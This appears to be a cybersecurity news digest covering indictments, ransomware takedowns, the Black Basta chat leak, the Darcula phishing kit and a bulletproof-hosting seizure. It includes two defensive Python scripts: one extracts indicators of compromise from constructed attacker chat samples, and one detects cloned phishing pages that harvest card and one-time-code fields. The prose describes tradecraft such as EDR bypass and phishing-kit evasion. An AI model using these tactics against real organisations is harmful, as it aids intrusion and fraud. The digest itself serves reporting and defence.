@World - CBSNews.com
//
The U.S. Justice Department has indicted 12 Chinese nationals for their alleged roles in state-linked cyber operations: employees of the Chinese technology firm i-Soon (Anxun Information Technology Co. Ltd), members of the APT27 group (also tracked as Emissary Panda, TG-3390, Bronze Union and Lucky Mouse), and two officers of China's Ministry of Public Security (MPS). The indictments describe the hacking tools and methods allegedly used in a long-running global intrusion campaign. According to the Justice Department, the Ministry of State Security (MSS) and the MPS relied on an extensive network of private companies, including i-Soon, to carry out unauthorized computer intrusions in the U.S. and elsewhere.
The defendants are charged with stealing data and with targeting critics and dissidents worldwide in order to suppress free speech. i-Soon allegedly sold hacking tools and services to PRC (People's Republic of China) government customers and carried out intrusions on their behalf; The Register reports that it was paid up to $75,000 for a single compromised inbox. The case illustrates a broader concern: state-sponsored actors outsourcing cyber espionage to private contractors, which blurs the line between government operators and hackers for hire.
References :
- bsky.app: US Justice Department has charged Chinese state security officers and APT27 and i-Soon Chinese hackers linked to network breaches and cyberattacks targeting victims worldwide since 2011.
- CyberInsider: U.S. Charges 12 Chinese Nationals Over Decade-Long Cyber Espionage Campaign
- The Cyber Express: The United States Department of Justice (DOJ) has taken action against a major cyber threat, opening indictments against 12 Chinese nationals, including two officers from China’s Ministry of Public Security (MPS) and several employees of the Chinese technology firm i-Soon.
- bsky.app: USA accuses China's State of operating network of "hackers for hire". Accused 12 individuals, 2 officers of the PRC Ministry of Public Security (MPS), employees of a private company, Anxun Information Technology Co. Ltd, and members of APT27.
- The Hacker News: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
- securityaffairs.com: US DOJ charges 12 Chinese nationals for state-linked cyber operations
- The Register - Security: Xi's freelance infosec warriors apparently paid up to $75K to crack a single American inbox US government agencies announced Wednesday criminal charges against alleged members of China's Silk Typhoon gang, plus internet domain seizures linked to a long-term Chinese espionage campaign that saw Beijing hire miscreants to compromise US government agencies and other major orgs.…
- DataBreaches.Net: U.S. Charges 12 Chinese Contract Hackers and Law Enforcement Officers in Global Computer Intrusion Campaigns
- cyble.com: U.S. Indictments Shed Light on i-Soon Hacking Tools, Methods
- Metacurity: US indicts twelve prolific Chinese hackers, including eight i-Soon staffers
- Carly Page: The Department of Justice has announced criminal charges against 12 Chinese government-linked hackers who are accused of hacking over 100 American organizations, including the U.S. Treasury, over the course of a decade
- Threats | CyberScoop: US indicts 12 Chinese nationals for vast espionage attack spree
- BleepingComputer: The U.S. Justice Department has charged Chinese state security officers along with APT27 and i-Soon hackers for network breaches and cyberattacks that have targeted victims globally since 2011.
- hackread.com: US Charges 12 in Chinese Hacker-for-Hire Network, Offers $10M Reward
- Risky Business: US indicts the i-Soon and APT27 hackers, the BADBOX botnet gets disrupted again, authorities seize the Garantex crypto exchange, and the FBI arrests hackers who stole Taylor Swift concert tickets.
- Security | TechRepublic: Targets included the U.S. Treasury Department, journalists, and religious organisations, and the attacks intended to steal data and suppress free speech.
- techxplore.com: US indicts 12 Chinese nationals in hacking
- US Charges Members of Chinese Hacker-for-Hire Group i-Soon
- Matthias Schulze: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
@techcrunch.com
//
A global police operation involving agencies from Europe, Japan, the U.S. and the U.K. has seized the dark web leak site of the 8Base ransomware gang. Lucy Sneddon, a spokesperson for the U.K.'s National Crime Agency, confirmed that the takedown message displayed on the site was legitimate. The U.K. played a supporting role; the other agencies involved had not commented at the time of writing. Security researchers first noticed the seizure notice earlier this week.
The operation, codenamed "Phobos Aetor", is part of a broader effort against ransomware crews. As part of it, authorities arrested four suspected Phobos ransomware operators in Phuket, Thailand, in raids across multiple locations. The four are accused of attacks on more than 1,000 victims worldwide and of extorting roughly $16 million in Bitcoin; 8Base is described as the largest affiliate of the Phobos ransomware-as-a-service operation.
References :
- CyberInsider: Phobos Ransomware Gang Dismantled in International Sting
- BleepingComputer: Police arrests 4 Phobos ransomware suspects, seizes 8Base sites
- BleepingComputer: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide.
- Carly Page: Mastodon post confirming the takedown of 8Base's leak site.
- techcrunch.com: TechCrunch reports on the global police operation seizing the 8base ransomware gang leak site.
- www.bleepingcomputer.com: BleepingComputer's report on the takedown of 8Base's dark web sites.
- DataBreaches.Net: Reports on police arresting 4 Phobos ransomware suspects and seizing 8Base sites.
- Threats | CyberScoop: cyberscoop article on 8base
- cyberscoop.com: Thai authorities detain four Europeans in ransomware crackdown
- Anonymous: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites.
- The Register - Security: The Register: All your 8Base are belong to us: Ransomware crew busted in global sting
- securityaffairs.com: Report on the 8Base ransomware takedown highlighting the international collaboration.
- The Hacker News: The Hacker News: 8Base Ransomware Data Leak Sites Seized in International Law Enforcement Operation
- www.helpnetsecurity.com: The Thai police has arrested four individuals suspected of being the leaders of the 8Base ransomware group and of stealing approximately $16 million from 1,000+ victims they targeted with the Phobos ransomware.
- socradar.io: International Operation Targets 8Base and Phobos Ransomware Gangs In a coordinated global effort, law enforcement agencies have successfully dismantled the dark web infrastructure of the 8Base ransomware gang and arrested four individuals linked to the Phobos ransomware.
- Help Net Security: 8Base ransomware group leaders arrested, leak site seized
- PCMag UK security: An international operation has dealt a major blow to a cybergang known as 8Base, which used the Phobos to infect hundreds of companies and organizations.
- techcrunch.com: Authorities arrest four suspected 8base ransomware operators in global takedown
- www.europol.europa.eu: Report on the global law enforcement operation that led to the arrests.
- Security Boulevard: Authorities Seize 8Base Ransomware Infrastructure, Arrest Four Russians
- securityboulevard.com: With "Operation Phobos Aetor," international law enforcement, including the US DOJ and Europol, arrest four Russian nationals and seize infrastructure connected to the 8Base ransomware group, the largest affiliate of the prolific Phobos RaaS operation.
- securityaffairs.com: Global law enforcement operation targeting the 8Base ransomware gang and related criminal activity.
- Carly Page: A global law enforcement operation has led to the arrest of four individuals who authorities accuse of being key figures in the 8base ransomware operation. The four suspects are accused of amassing $16 million through ransomware attacks against more than 1,000 organizations globally
- www.csoonline.com: Law enforcement agencies from 14 countries collaborated in an investigation against the related Phobos and 8Base ransomware operations, arresting four suspects and seizing 27 servers, including the data leak and ransom negotiation websites.
Dissent@DataBreaches.Net
//
Leaked internal chat logs from the Black Basta ransomware group have given defenders unusual insight into the tactics, planning and day-to-day operations of a major cybercrime crew. The Veriti Research team analyzed the communications and identified the group's favored exploits, the security controls it routinely bypasses, and the defenses it fears most. The leak, comparable in scale to the 2022 Conti leak, shows how carefully Black Basta studied potential victims and how it built its phishing and malware campaigns.
The analysis shows Black Basta concentrating on vulnerabilities in VMware ESXi, Microsoft Exchange, Citrix VPNs and Fortinet firewalls, the internet-facing and virtualization layers that give an intruder both initial access and broad reach once inside. Members discuss bypassing EDR, SIEM and firewall controls to keep persistence in compromised networks, and they lean on legitimate cloud services to host malware and command-and-control infrastructure. Even so, they complain when EDR, firewalls and IP-reputation monitoring disrupt their operations, which is a useful signal about which controls actually impose cost on the attacker. One senior member claimed to have eluded law enforcement in mid-2024 with help from influential people.
References :
- VERITI: Inside the Minds of Cybercriminals: A Deep Dive into Black Basta’s Leaked Chats
- DataBreaches.Net: Black Basta exposed: A look at a cybercrime data leak and a key member, “Tramp”
- www.csoonline.com: Ransomware access playbook: What Black Basta’s leaked logs reveal
- Information Security Buzz: VulnCheck Exposes CVEs from Black Bastas’ Chats
- Risky Business: Risky Business Talks interview with Will Thomas on the Black Basta leaks
- bsky.app: New research has uncovered further links between the Black Basta and Cactus ransomware gangs, with members of both groups utilizing the same social engineering attacks and the BackConnect proxy malware for post-exploitation access to corporate networks.
- Virus Bulletin: Trend Micro researchers discuss how the Black Basta and Cactus ransomware groups utilized the BackConnect malware to maintain persistent control and exfiltrate sensitive data from compromised machines.
- www.bleepingcomputer.com: Microsoft Teams tactics, malware connect Black Basta, Cactus ransomware
- Secure Bulletin: Black Basta and CACTUS ransomware: shared BackConnect module signals affiliate transition
- flare.io: On February 20, 2025, the cybersecurity community received an unexpected stroke of luck as internal strife seemingly spread within the infamous Black Basta ransomware group.
Amar Ćemanović@CyberInsider
//
Japanese telecom giant NTT Communications (NTT Com) has confirmed a data breach affecting nearly 18,000 corporate customers. The company discovered unauthorized access to its internal systems on February 5, 2025.
According to NTT Com, the stolen data covers 17,891 organizations and includes customer names, contract numbers, phone numbers, email addresses, physical addresses and details of service usage. NTT Com restricted access to the compromised systems and later disconnected a second compromised device, but it has not said how the attackers got in or who was behind the intrusion, and it is not yet known how many individuals had personal data stolen.
References :
- Carly Page: Japanese telecom giant NTT Communications says hackers stole the data of almost 18,000 corporate customers during a February cyberattack. It’s not yet known how many individuals had personal data stolen or who was behind the NTT breach
- CyberInsider: NTT Communications Suffers Data Breach Impacting 18,000 Companies
- BleepingComputer: Japanese telecommunication services provider NTT Communications Corporation (NTT) is warning almost 18,000 corporate customers that their information was compromised during a cybersecurity incident.
- techcrunch.com: Unidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers
- The DefendOps Diaries: Lessons from the NTT Data Breach: A 2025 Perspective
- www.scworld.com: NTT Communications says hackers stole the data of almost 18,000 corporate customers during a February cyberattack
- securityaffairs.com: Japanese telecom giant NTT suffered a data breach that impacted 18,000 companies
- The420.in: Japanese Telecom Giant NTT Suffers Data Breach, Impacting 18,000 Companies
@www.chainalysis.com
//
Ransomware payments fell sharply in 2024, dropping 35% to roughly $813.55 million, according to Chainalysis, down from a record $1.25 billion in 2023. The decline reflects a growing number of victims refusing to pay, even though ransomware gangs posted more victims on leak sites than before. The gap suggests organizations are becoming more resilient, likely because of better backup and recovery practices and the effect of law enforcement interventions.
The drop was concentrated in the second half of 2024. Chainalysis notes that the sums demanded in that period were 53% higher than what was actually paid, a sign that victims are increasingly negotiating down or walking away. Law enforcement actions, including the disruption of prolific gangs such as LockBit and improved international coordination, also contributed to the downturn.
References :
- Carly Page: Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers
- Help Net Security: Ransomware payments plummet as more victims refuse to pay
- techcrunch.com: TechCrunch covers Chainalysis' report on the decline in ransomware payments.
- www.chainalysis.com: Chainalysis' blog post presents their full analysis of the cryptocurrency crime trends in 2024.
- www.cybersecurity-insiders.com: Good news as ransomware pay fell by 35 percent in 2024
- Ars OpenForum: Amount paid by victims to hackers declined by hundreds of millions of dollars.
- Techmeme: In 2024, ransomware attackers received ~$813.55M in payments from victims, down 35% on 2023's record $1.25B, as more victims refused to pay (Chainalysis)
- Moonshot News: Ransomware payments have changed dramatically
- moonshot.news: Ransomware payments fell 35% in 2024 from 2023 record-breaking $1.25 billion down to $813.55 million, marking the first revenue decline since 2022, US blockchain data platform Chainalysis reports.
- cyberscoop.com: CyberScoop reports that ransomware payments dropped 35% in 2024.
- Blog: Field Effect reports on the decline in ransomware payments and increase in attack frequency.
- securityboulevard.com: Law enforcement actions, better defenses, and a refusal by victims to pay helped to reduce the amount of ransoms paid in 2024 by 35%, a sharp decline from the record $1.25 billion shelled out in 2023, according to researchers with Chainalysis.
- www.heise.de: Various measures against cybercriminals have once again shown success in 2024: Ransom payments following ransomware attacks have fallen again.
- cyberpress.org: Cyberpress reports on ransomware payments plummeting in 2024.
- TechInformed: TechInformed reports on ransomware payments plummeting in 2024.
Lily Hay@WIRED
//
Cybercriminals allegedly stole more than $635,000 worth of Taylor Swift concert tickets through a backdoor in a StubHub contractor's systems. Two people, Tyrone Rose, 20, and Shamara Simmons, 31, have been arrested and charged with grand larceny and computer tampering. The scheme involved stealing the URLs for nearly 1,000 tickets to events including Taylor Swift's Eras Tour, Ed Sheeran and Adele concerts, NBA games and the US Open Tennis Championships, then reselling them at a substantial profit.
Between June 2022 and July 2023, Rose and Simmons allegedly obtained the tickets through an offshore ticket vendor and resold them on StubHub in the U.S. Rose, an employee of Sutherland Global Services, a third-party contractor that handled StubHub work in Jamaica, is accused of abusing his network access to find a backdoor into the system. Prosecutors say the pair intercepted approximately 350 StubHub orders. In effect the ticket URLs acted as bearer tokens: whoever held a link held the ticket, which is why stolen links could simply be resold. The investigation is continuing to determine whether the scheme was part of a wider operation.
References :
- WIRED: Cybercriminals Allegedly Used a StubHub Backdoor to Steal Taylor Swift Tickets
- The Register - Security: Alleged cyber scalpers Swiftly cuffed over $635K Taylor ticket heist
- The DefendOps Diaries: Cybercrime Exposes Vulnerabilities in Ticketing Systems: A Case Study
- BleepingComputer: Cybercrime 'crew' stole $635,000 in Taylor Swift concert tickets
- darkmarc.substack.com: Cybercriminals pulled off a massive ATM heist, hackers stole $600K in Taylor Swift concert tickets, and Mark Cuban made a bold move for laid-off tech workers. Instagram users were hit with a disturbing glitch, and Mozilla’s new terms sparked privacy fears. Here’s what happened this week.
- www.techradar.com: Cybercriminals used vendor backdoor to steal almost $600,000 of Taylor Swift tickets
@www.the420.in
//
A large cache of internal chat logs from the Black Basta ransomware gang has surfaced online, exposing the group's inner workings. TechCrunch obtained a copy of the logs, which span September 2023 to September 2024 and reveal internal strife, financial disputes and operational detail. The messages identify key members, targeted organizations and exploits, and show the members' fear of the Russian government; the person who leaked the logs alleged that the group had "crossed the line" by targeting Russian domestic banks.
The logs also describe Black Basta's structure, including administrators and hackers linked to the Qakbot botnet. One member, who appears as "Tramp" and under the handles "AA" and "GG", is believed to be Oleg Nefedovaka, thought to be the group's main boss and connected to the defunct Conti ransomware group. The leak further exposed Black Basta's phishing templates, stolen victim credentials and cryptocurrency addresses. For defenders that is actionable material: the credentials tell victims what to rotate, and the templates, addresses and discussed exploits can be turned into detection, blocking and patch-priority lists, which may disrupt the gang's operations as much as the internal fallout does.
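The Veriti and VulnCheck work described in the earlier Black Basta item, and the credentials, templates and wallet addresses mentioned here, all come down to the same first step: pulling indicators out of an unstructured chat dump. The script below is an added example, not the leaked data and not Veriti's or VulnCheck's tooling. It assumes a JSON-lines export with `ts`, `from` and `msg` fields (the real leak's schema is not given on this page), and its sample messages are constructed: the CVE IDs are real identifiers used purely as format examples, the wallet addresses are the documentation examples from BIP-173 and Wikipedia, and the hostnames sit under reserved example domains.

```python
import json
import re
from collections import Counter

# Constructed sample in an assumed JSON-lines shape ("ts", "from", "msg").
# Neither the field names nor the contents come from the real leak: the CVE
# IDs are real identifiers used only as format examples (no claim that the
# gang discussed them), the wallets are the documentation examples from
# BIP-173 and Wikipedia, and the hostnames sit under reserved example domains.
SAMPLE_LOG = """\
{"ts": "2024-03-01T10:02:11", "from": "tramp", "msg": "esxi boxes first, CVE-2024-37085, then cve-2021-34473 on the exchange side"}
{"ts": "2024-03-01T10:04:40", "from": "gg", "msg": "exchange is patched for CVE-2021-34473, use the fortinet one CVE-2024-21762"}
{"ts": "2024-03-02T08:15:03", "from": "tramp", "msg": "payment to bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq, loader staged on cdn-update.example.com"}
{"ts": "2024-03-02T08:16:30", "from": "aa", "msg": "second wallet 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2, c2 at vpn-portal.example.net:443, CVE-2024-37085 again"}
not json: a torn line from the export
"""

CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,7}\b", re.IGNORECASE)
# Bitcoin: bech32/bech32m (bc1...) or legacy base58 (1.../3...).
BTC_RE = re.compile(
    r"\b(?:bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{6,87}"
    r"|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b"
)
# Lower-case hostnames only; the chat text is lower-cased before matching.
HOST_RE = re.compile(r"\b(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}\b")


def parse_messages(log_text):
    """Yield message dicts from a JSON-lines export, skipping torn lines."""
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def extract_iocs(log_text):
    """Count CVEs, wallets and hostnames per message, plus CVE mentions per speaker."""
    cves, wallets, hosts, per_speaker = Counter(), Counter(), Counter(), Counter()
    for msg in parse_messages(log_text):
        text = msg.get("msg", "")
        sender = msg.get("from", "unknown")
        # One hit per message, so a chatty member cannot inflate a CVE's count.
        for cve in {c.upper() for c in CVE_RE.findall(text)}:
            cves[cve] += 1
            per_speaker[sender] += 1
        for wallet in set(BTC_RE.findall(text)):
            wallets[wallet] += 1
        for host in set(HOST_RE.findall(text.lower())):
            hosts[host] += 1
    return {"cves": cves, "wallets": wallets, "hosts": hosts,
            "cve_mentions_by_speaker": per_speaker}


def top_cves(log_text, n=3):
    """Most-discussed CVEs: the patch-priority list a defender wants first."""
    return extract_iocs(log_text)["cves"].most_common(n)


if __name__ == "__main__":
    for key, counter in extract_iocs(SAMPLE_LOG).items():
        print(key, dict(counter))
```

Counting one hit per message rather than per occurrence keeps the ranking honest when one member repeats himself, and lower-casing before the hostname pass avoids missing mixed-case domains while leaving the base58 wallet match case-sensitive, as it must be. On a real dump the wallet and hostname counters feed blocklists and chain-analysis queries, the per-speaker counter helps map who drives exploit selection, and the CVE ranking is the list to check against your own patch status first.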
References :
- techcrunch.com: A huge trove of chat logs from the Black Basta ransomware gang have leaked online. TechCrunch obtained a copy.
- cyberinsider.com: A major leak of internal chat logs from the Black Basta ransomware gang has exposed deep internal conflicts, failed operations, and financial disputes.
- www.scworld.com: Purported Black Basta internal communications exposed
- www.the420.in: A massive leak of internal chat logs from the BlackBasta ransomware group has exposed the inner workings of the notorious cybercriminal organization, revealing internal conflicts, financial disputes, and the group’s eventual disbanding.
- Zack Whittaker: New, w/ : A huge trove of chat logs from the Black Basta ransomware gang have leaked online. TechCrunch obtained a copy. The logs reveal new details on the group's members (including a 17-year-old), which organizations it targeted, their exploits, and their fears of being vanned by the Russian government. More:
- socradar.io: Black Basta’s Internal Chats Leak: Everything You Need to Know
- CyberInsider: Black Basta Ransomware Chats Leaked Exposing Internal Chaos
- threatmon.io: The Implosion of Black Basta: A Deep Dive into the Leaked Chat Logs and Operational Collapse The recent leak of internal chat logs from the Black Basta ransomware syndicate has provided unprecedented visibility into the operations, conflicts, and eventual disintegration of one of the most prolific cybercriminal groups of the past three years.
- Blog: New Details on Black Basta Operations via Leaked Chats on Telegram
- ThreatMon: The Implosion of Black Basta: A Deep Dive into the Leaked Chat Logs and Operational Collapse
- Carly Page: A trove of chat logs allegedly belonging to the prolific Black Basta ransomware group has leaked online, revealing unprecedented insights into the gang's operations The logs, seen by TechCrunch, also name several previously unknown targeted organizations
- bsky.app: Article reporting on the leak of Black Basta ransomware gang's internal chat logs.
- www.bleepingcomputer.com: Article on the Black Basta ransomware gang's internal chat logs leak.
- arstechnica.com: Report sheds new light on the tactics allowing Black Basta and other attackers to move at breakneck speed.
- mastodon.social: A significant leak of internal chat logs from the Black Basta ransomware group revealed significant operational details.
- securityaffairs.com: Leaked Black Basta chat logs reveal internal conflicts, exposing member details and hacking tools as the gang reportedly falls apart.
- Kali Linux Tutorials: BlackBasta Chat : The Inner Workings Of A Notorious Ransomware Group
- socradar.io: Seraph Stealer Malware Hits the Market, Black Basta’s Internal Chaos, New Data Leak Claims
- thecyberexpress.com: Black Basta Chat Logs Reveal Ransomware Group’s TTPs, IoCs
- DataBreaches.Net: DataBreaches.net reporting Black Basta exposed: A look at a cybercrime data leak and a key member, “Tramp”.
- blog.bushidotoken.net: BushidoToken analysis of BlackBasta Leaks: Lessons from the Ascension Health attack
- VERITI: Veriti's analysis of Black Basta's Leaked Chats.
Dhara Shrivastava@cysecurity.news
//
February saw a record number of ransomware attacks, driven in part by the prolific CL0P group, known for exploiting vulnerabilities in managed file transfer (MFT) products. Akira and RansomHub were also highly active.
Trend Micro's analysis of the Black Basta and CACTUS ransomware groups found a shared BackConnect module, tracked internally as QBACKCONNECT, which gives operators extensive remote control of a compromised host, including command execution and exfiltration of sensitive data; the same tooling and social-engineering lures appearing in both operations points to affiliates moving between them. Separately, the Qilin ransomware group claimed attacks on the Utsunomiya Central Clinic (UCC), a cancer treatment center in Japan, and Rockhill Women's Care, a gynecology facility in Kansas City, stealing and leaking sensitive patient data.
References :
- cyble.com: February Sees Record-Breaking Ransomware Attacks, New Data Shows
- The Register - Security: Qilin ransomware gang claims attacks on cancer clinic, OB-GYN facility
- iHLS: Ransomware Group Targets Cancer Clinic, Exposes Sensitive Health Data
- securityaffairs.com: Medusa ransomware has claimed nearly 400 victims since January 2023, with attacks increasing by 42% between 2023 and 2024.
- thecyberexpress.com: Ransomware attacks set a single-month record in February that was well above previous highs.
- The DefendOps Diaries: Akira Ransomware: Unsecured Webcams and IoT Vulnerabilities
- blog.knowbe4.com: A new report from Arctic Wolf has found that 96% of attacks now involve data theft as criminals seek to force victims to pay up.
- DataBreaches.Net: The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim's network.
@techcrunch.com
//
A global law enforcement operation has disrupted the 8Base ransomware group, with four people accused of being key figures in the operation arrested in Phuket, Thailand. The suspects are alleged to have extorted $16 million through ransomware attacks on more than 1,000 organizations worldwide. Authorities also seized the group's dark web infrastructure.
The operation, codenamed "Phobos Aetor", took down 8Base's data leak and negotiation sites, removing its ability to pressure existing victims and to publish stolen data. Coordinated raids across multiple locations yielded laptops, smartphones and cryptocurrency wallets; in total, investigators from 14 countries seized 27 servers.
References :
- BleepingComputer: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide.
- Carly Page: A global law enforcement operation has led to the arrest of four individuals who authorities accuse of being key figures in the 8base ransomware operation. The four suspects are accused of amassing $16 million through ransomware attacks against more than 1,000 organizations globally
- securityaffairs.com: Operation Phobos Aetor: Police dismantled 8Base ransomware gang
- cyberscoop.com: Thai authorities detain four Europeans in ransomware crackdown
- The Register - Security: All your 8Base are belong to us: Ransomware crew busted in global sting
- socradar.io: International Operation Targets 8Base and Phobos Ransomware Gangs
- securityboulevard.com: Authorities Seize 8Base Ransomware Infrastructure, Arrest Four Russians
- techcrunch.com: Authorities arrest four suspects in global 8base ransomware takedown
@www.bleepingcomputer.com
//
The Darcula phishing-as-a-service (PhaaS) platform is preparing to release its third major version, Darcula 3.0. Its headline feature lets even technically unskilled users build and deploy do-it-yourself phishing kits against any brand. The kit generator uses browser automation (Puppeteer and Headless Chrome) to load a legitimate site, extract its assets and HTML structure, and inject malicious content, after which the user can customize the template and generate multi-step pages that collect payment details and two-factor authentication codes.
The resulting kit is exported as a ".cat-page" bundle and deployed through Darcula's admin panel. The panel, which resembles a legitimate software-as-a-service (SaaS) product, provides dashboards to manage stolen data, monitor campaigns and configure evasion: IP filtering, web-crawler blocking and device-specific access restrictions, all aimed at keeping scanners and researchers from seeing the phishing content while the intended victims do. It is built on Docker, React and SQLite. The platform also helps monetize stolen data by generating virtual cards from compromised payment details. The practical consequence for defenders is that brand impersonation no longer requires skill, so detection has to rely on structural signals of a clone rather than on the crudeness of the fake.
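Because a kit like this reproduces the brand's own HTML and assets, the usual "does it look fake" test stops working; what a clone cannot easily hide is where it is served from and where its forms post. The scanner below is an added example, not code from the page or from any of the cited reports. It takes a captured page plus the URL it was served from and flags a form that posts off-host, brand assets or links borrowed onto a non-brand host, a brand name in the title on a non-brand host, and payment or one-time-code fields on such a host. Both pages and all hostnames are constructed under reserved example domains; `examplebank.example` is a hypothetical brand.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Field names / autocomplete tokens that a card or login step would harvest.
SENSITIVE_NAMES = {"cardnumber", "card_number", "ccnum", "cvv", "cvc",
                   "expiry", "otp", "passcode", "password", "pin"}


class PageScanner(HTMLParser):
    """Collect form targets, resource/link hosts, sensitive inputs and the title."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.sensitive_inputs = [], []
        self.resource_hosts, self.link_hosts = set(), set()
        self.title, self._in_title = "", False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag in ("img", "script", "link", "iframe"):
            host = urlparse(a.get("src") or a.get("href") or "").hostname
            if host:
                self.resource_hosts.add(host.lower())
        elif tag == "a":
            host = urlparse(a.get("href", "")).hostname
            if host:
                self.link_hosts.add(host.lower())
        elif tag == "input":
            name = (a.get("name") or a.get("id") or "").lower()
            auto = a.get("autocomplete", "").lower()
            if name in SENSITIVE_NAMES or auto.startswith("cc-") or auto == "one-time-code":
                self.sensitive_inputs.append(name or auto)
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def is_brand_host(host, brand_domain):
    return host == brand_domain or host.endswith("." + brand_domain)


def assess_page(page_url, html, brand_domain):
    """Return a list of findings; an empty list means nothing looked like a clone."""
    scanner = PageScanner()
    scanner.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for action in scanner.form_actions:
        # Resolve relative actions against the page URL before comparing hosts.
        target = (urlparse(urljoin(page_url, action)).hostname or "").lower()
        if target and target != page_host:
            findings.append(f"form posts off-host to {target}")
    if not is_brand_host(page_host, brand_domain):
        borrowed = {h for h in scanner.resource_hosts | scanner.link_hosts
                    if is_brand_host(h, brand_domain)}
        if borrowed:
            findings.append(f"page on {page_host} borrows assets/links from "
                            + ", ".join(sorted(borrowed)))
        if brand_domain.split(".")[0] in scanner.title.lower():
            findings.append(f"title '{scanner.title.strip()}' names the brand on a non-brand host")
        if scanner.sensitive_inputs:
            findings.append("harvests " + ", ".join(scanner.sensitive_inputs))
    return findings


# Constructed pages under reserved example domains; "examplebank" is hypothetical.
CLONE_URL = "https://examplebank-verify.example.net/cat/step1"
CLONE_HTML = """<html><head><title>ExampleBank - Verify your card</title>
<link rel="stylesheet" href="https://www.examplebank.example/static/site.css"></head>
<body><img src="https://www.examplebank.example/static/logo.png">
<form action="https://collect.example.org/step2" method="post">
<input name="cardnumber" autocomplete="cc-number"><input name="cvv">
<input name="otp" autocomplete="one-time-code"><button>Continue</button></form>
<a href="https://www.examplebank.example/help">Help</a></body></html>"""

LEGIT_URL = "https://www.examplebank.example/login"
LEGIT_HTML = """<html><head><title>ExampleBank - Sign in</title>
<link rel="stylesheet" href="https://cdn.examplebank.example/site.css"></head>
<body><form action="/login" method="post"><input name="username">
<input name="password"></form></body></html>"""

if __name__ == "__main__":
    for url, html in ((CLONE_URL, CLONE_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(url, assess_page(url, html, "examplebank.example") or ["clean"])
```

The sensitive-field check is deliberately conditional on a non-brand host, since a real login page collects passwords too; on its own it is not evidence. The form-target check is the one that survives a kit that copies the assets rather than hotlinking them, because the harvested data still has to leave the page for somewhere the operator controls. Run this over the HTML you actually got served, not over a fetch from a scanner IP: the IP filtering and crawler blocking described above exist precisely so that automated fetches see something harmless.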
References :
- cyberpress.org: Darcula 3.0 – A Tool that Offer Phishing kit for Any Brands
- The Hacker News: Cybercriminals Can Now Clone Any Brand’s Site in Minutes Using Darcula PhaaS v3
- www.bleepingcomputer.com: The Darcula phishing-as-a-service (PhaaS) platform is preparing to release its third major version, with one of the highlighted features, the ability to create do-it-yourself phishing kits to target any brand.
- www.helpnetsecurity.com: Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand
- gbhackers.com: New Darcula 3.0 Tool Generates Phishing Kits to Mimic Global Brands
- Talkback Resources: 'Darcula' Phishing Kit Can Now Impersonate Any Brand
- The420.in: Cybercriminals behind the notorious Darcula phishing-as-a-service (PhaaS) platform are preparing to roll out a new and more sophisticated version that enables scammers to clone any brand’s legitimate website effortlessly.
- www.the420.in: Darcula Phishing Platform Set to Launch Advanced Version
- Cybernews: Infosec exchange discussing new phishing tool for cybercriminals
@cyberinsider.com
//
Dutch Police have dismantled the ZServers/XHost bulletproof hosting operation, taking 127 servers offline and seizing them. The takedown followed a year-long investigation into the network, which cybercriminals used to host malware, botnet infrastructure and other attack tooling.
Earlier the same week, the United States, Australia and the United Kingdom announced sanctions against the same provider for its role in cybercrime. ZServers was accused of hosting infrastructure for LockBit ransomware attacks and of helping the criminals launder illegally obtained money, according to The Record. The Cybercrime Team Amsterdam will now examine the seized servers; the company had advertised that customers could carry out criminal acts from its servers while remaining anonymous to law enforcement.
Recommended read:
References :
- cyberinsider.com: Police Dismantle Bulletproof Hosting Provider ZServers/XHost
- gbhackers.com: Dutch Authorities Dismantle Network of 127 Command-and-Control Servers
- www.bleepingcomputer.com: The Dutch Police (Politie) dismantled the ZServers/XHost bulletproof hosting operation after taking offline 127 servers used by the illegal platform.
- www.scworld.com: Zservers/XHost servers dismantled by Dutch police
- Metacurity: Dutch cops dismantle ZServers bulletproof hosting operation
- BleepingComputer: The Dutch Police (Politie) dismantled the ZServers/XHost bulletproof hosting operation after taking offline 127 servers used by the illegal platform.
- CyberInsider: Police Dismantle Bulletproof Hosting Provider ZServers/XHost
- DataBreaches.Net: Dutch Police seizes 127 XHost servers, dismantles bulletproof hoster
- www.politie.nl: Politie Amsterdam ontmantelt digitaal crimineel netwerk; 127 servers offline gehaald - "an investigation of over a year, dismantled a bulletproof hoster on the Paul van Vlissingenstraat in Amsterdam. During the raid on February 12, 127 servers were taken offline and seized."
- Cybernews: After a year-long investigation, Amsterdam's Cybercrime Team shut down a bulletproof hosting provider, seizing 127 servers.
- securityaffairs.com: Dutch Police shut down bulletproof hosting provider Zservers and seized 127 servers
Swagta Nath@The420.in
//
